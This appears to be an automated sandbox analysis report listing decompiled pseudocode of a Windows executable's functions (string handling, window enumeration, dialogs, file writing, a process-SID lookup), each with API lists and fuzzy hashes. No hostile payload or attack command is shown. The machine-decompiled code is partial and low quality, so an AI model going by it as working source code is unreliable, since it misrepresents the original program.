                                                                                                                				E00406670( &_v4496, _t45);
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				memset( &_v3672, 0, 0x10);
                                                                                                                				E0040A909( &_v1072);
                                                                                                                				_t41 = _a4;
                                                                                                                				_v4556 = 0x71;
                                                                                                                				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                                					L0040B266();
                                                                                                                					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                                				}
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E004067AC( &_v4496);
                                                                                                                				return E00402940( &_v4560);
                                                                                                                			}














                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				void _v1026;
                                                                                                                				signed short _v1028;
                                                                                                                				void* __esi;
                                                                                                                				void* _t17;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				signed short* _t28;
                                                                                                                
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				_t26 = __ecx;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = _v1028 & 0x00000000;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                				_t28 =  &_v516;
                                                                                                                				E00407250(_t28, _t17);
                                                                                                                				_push(_t28);
                                                                                                                				_push(L"</%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t26, _a4,  &_v1028);
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v8198;
                                                                                                                				short _v8200;
                                                                                                                				void* _t9;
                                                                                                                				void* _t12;
                                                                                                                				intOrPtr _t19;
                                                                                                                				intOrPtr _t20;
                                                                                                                
                                                                                                                				_t19 = __ecx;
                                                                                                                				_t9 = E0040B550(0x2004, __ecx);
                                                                                                                				_t20 = _t19;
                                                                                                                				if(_t20 == 0) {
                                                                                                                					_t20 =  *0x40fe24; // 0x0
                                                                                                                				}
                                                                                                                				_t25 =  *0x40fb90;
                                                                                                                				if( *0x40fb90 != 0) {
                                                                                                                					_v8200 = _v8200 & 0x00000000;
                                                                                                                					memset( &_v8198, 0, 0x2000);
                                                                                                                					_push(_t20);
                                                                                                                					_t12 = 5;
                                                                                                                					E00405E8D(_t12);
                                                                                                                					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                						SetWindowTextW(_a4,  &_v8200);
                                                                                                                					}
                                                                                                                					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				struct HINSTANCE__* _t11;
                                                                                                                				struct HINSTANCE__** _t14;
                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                                					_t11 = E00405436(L"winsta.dll");
                                                                                                                					 *_t14 = _t11;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t15 = _t14[1];
                                                                                                                				if(_t15 == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _t21;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t24;
                                                                                                                				signed int _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t44;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t51;
                                                                                                                				int _t52;
                                                                                                                				void** _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_t53 = __esi;
                                                                                                                				_t1 =  &(_t53[1]); // 0x0
                                                                                                                				_t51 =  *_t1;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t51 <= 0) {
                                                                                                                					L4:
                                                                                                                					_t2 =  &(_t53[2]); // 0x8
                                                                                                                					_t33 =  *_t53;
                                                                                                                					_t23 =  *_t2 + _t51;
                                                                                                                					_t46 = 8;
                                                                                                                					_t53[1] = _t23;
                                                                                                                					_t24 = _t23 * _t46;
                                                                                                                					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                					L0040B26C();
                                                                                                                					_t10 =  &(_t53[1]); // 0x0
                                                                                                                					 *_t53 = _t24;
                                                                                                                					memset(_t24, 0,  *_t10 << 3);
                                                                                                                					_t52 = _t51 << 3;
                                                                                                                					memcpy( *_t53, _t33, _t52);
                                                                                                                					if(_t33 != 0) {
                                                                                                                						_push(_t33);
                                                                                                                						L0040B272();
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                				} else {
                                                                                                                					_t44 =  *__esi;
                                                                                                                					_t48 = _t44;
                                                                                                                					while( *_t48 != 0) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						_t48 = _t48 + 8;
                                                                                                                						_t58 = _t21 - _t51;
                                                                                                                						if(_t58 < 0) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_t31 = _t21 << 3;
                                                                                                                					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                				}
                                                                                                                				L7:
                                                                                                                				return 1;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                                				void* _v8;
                                                                                                                				wchar_t* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				char _v40;
                                                                                                                				long _v564;
                                                                                                                				char* _t18;
                                                                                                                				char* _t22;
                                                                                                                				wchar_t* _t23;
                                                                                                                				intOrPtr* _t24;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				intOrPtr _t30;
                                                                                                                				void* _t35;
                                                                                                                				char* _t36;
                                                                                                                
                                                                                                                				_t18 =  &_v8;
                                                                                                                				_t30 = 0;
                                                                                                                				__imp__SHGetMalloc(_t18);
                                                                                                                				if(_t18 >= 0) {
                                                                                                                					_v40 = _a4;
                                                                                                                					_v28 = _a8;
                                                                                                                					_t22 =  &_v40;
                                                                                                                					_v36 = 0;
                                                                                                                					_v32 = 0;
                                                                                                                					_v24 = 4;
                                                                                                                					_v20 = E0040AC81;
                                                                                                                					_v16 = __esi;
                                                                                                                					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                                					_t36 = _t22;
                                                                                                                					if(_t36 != 0) {
                                                                                                                						_t23 =  &_v564;
                                                                                                                						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                                						if(_t23 != 0) {
                                                                                                                							_t30 = 1;
                                                                                                                							wcscpy(__esi,  &_v564);
                                                                                                                						}
                                                                                                                						_t24 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                                						_t26 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}





















                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                				long _v8;
                                                                                                                				long _v12;
                                                                                                                				long _t13;
                                                                                                                				void* _t14;
                                                                                                                				struct HWND__* _t24;
                                                                                                                
                                                                                                                				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                				_v12 = _t13;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t13 <= 0) {
                                                                                                                					L3:
                                                                                                                					_t14 = 0;
                                                                                                                				} else {
                                                                                                                					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 < _v12) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                					_t14 = 1;
                                                                                                                				}
                                                                                                                				L4:
                                                                                                                				return _t14;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                				long _v8;
                                                                                                                				void _v8199;
                                                                                                                				char _v8200;
                                                                                                                
                                                                                                                				E0040B550(0x2004, __ecx);
                                                                                                                				_v8200 = 0;
                                                                                                                				memset( &_v8199, 0, 0x1fff);
                                                                                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                                				int _t7;
                                                                                                                				void** _t11;
                                                                                                                
                                                                                                                				_t11 = __eax;
                                                                                                                				if( *0x4101b4 == 0) {
                                                                                                                					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                                					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                                					 *0x4101b4 = 1;
                                                                                                                					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                                					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                                					 *0x40f2f4 = _t7;
                                                                                                                					return 1;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}






                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                                				int _t10;
                                                                                                                				int _t12;
                                                                                                                				void* _t23;
                                                                                                                				wchar_t* _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t25 = wcslen(__edi);
                                                                                                                				_t10 = wcslen(_a4);
                                                                                                                				_t23 = _t10 + _t25;
                                                                                                                				if(_t23 >= 0x3ff) {
                                                                                                                					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                                					if(_t12 > 0) {
                                                                                                                						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					wcscat(__edi + _t25 * 2, _a4);
                                                                                                                				}
                                                                                                                				return _t24;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				struct HWND__* _t11;
                                                                                                                				struct HWND__* _t14;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				_t16 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                                				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                                				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                                				do {
                                                                                                                					E00402D99(_t15, _t16);
                                                                                                                					_t11 = GetWindow(_t15, 2);
                                                                                                                					_t15 = _t11;
                                                                                                                				} while (_t15 != 0);
                                                                                                                				return _t11;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
                                                                                                                				intOrPtr _t1;
                                                                                                                				intOrPtr _t2;
                                                                                                                				intOrPtr _t3;
                                                                                                                				intOrPtr _t4;
                                                                                                                
                                                                                                                				_t1 =  *0x41c458;
                                                                                                                				if(_t1 != 0) {
                                                                                                                					_push(_t1);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t2 =  *0x41c460;
